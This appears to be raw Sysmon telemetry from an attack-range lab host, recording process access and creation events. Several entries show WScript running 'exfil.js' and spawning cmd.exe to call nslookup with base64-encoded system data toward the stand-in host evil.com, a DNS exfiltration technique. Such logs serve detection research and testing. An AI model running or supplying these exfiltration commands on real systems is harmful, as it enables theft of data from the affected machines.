14:16:41.309{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9241-000000005F02}2512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.309{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.309{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.293{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.293{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.293{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9141-000000005F02}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.293{2E1864BB-17A1-629A-783D-000000005F02}55527736C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-9141-000000005F02}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.307{2E1864BB-17C9-629A-9141-000000005F02}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqklxq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.293{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlblb.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-17C9-629A-8F41-000000005F02}79606108C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9041-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9041-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.262{2E1864BB-17C9-629A-8E41-000000005F02}36204200C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-9041-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.274{2E1864BB-17C9-629A-9041-000000005F02}6520C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-8E41-000000005F02}3620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlblb.tmp 2>&1 10341000x8000000000000000203160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.246{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-8F41-000000005F02}7960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.246{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-8F41-000000005F02}7960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.243{2E1864BB-17C9-629A-8F41-000000005F02}79606108C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-8E41-000000005F02}3620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.224{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-8F41-000000005F02}7960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-8E41-000000005F02}3620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-17A1-629A-783D-000000005F02}55524128C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-8E41-000000005F02}3620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.220{2E1864BB-17C9-629A-8E41-000000005F02}3620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlblb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.208{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldwif.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.177{2E1864BB-17C9-629A-8C41-000000005F02}11048124C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-8D41-000000005F02}2616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.162{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-8D41-000000005F02}2616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 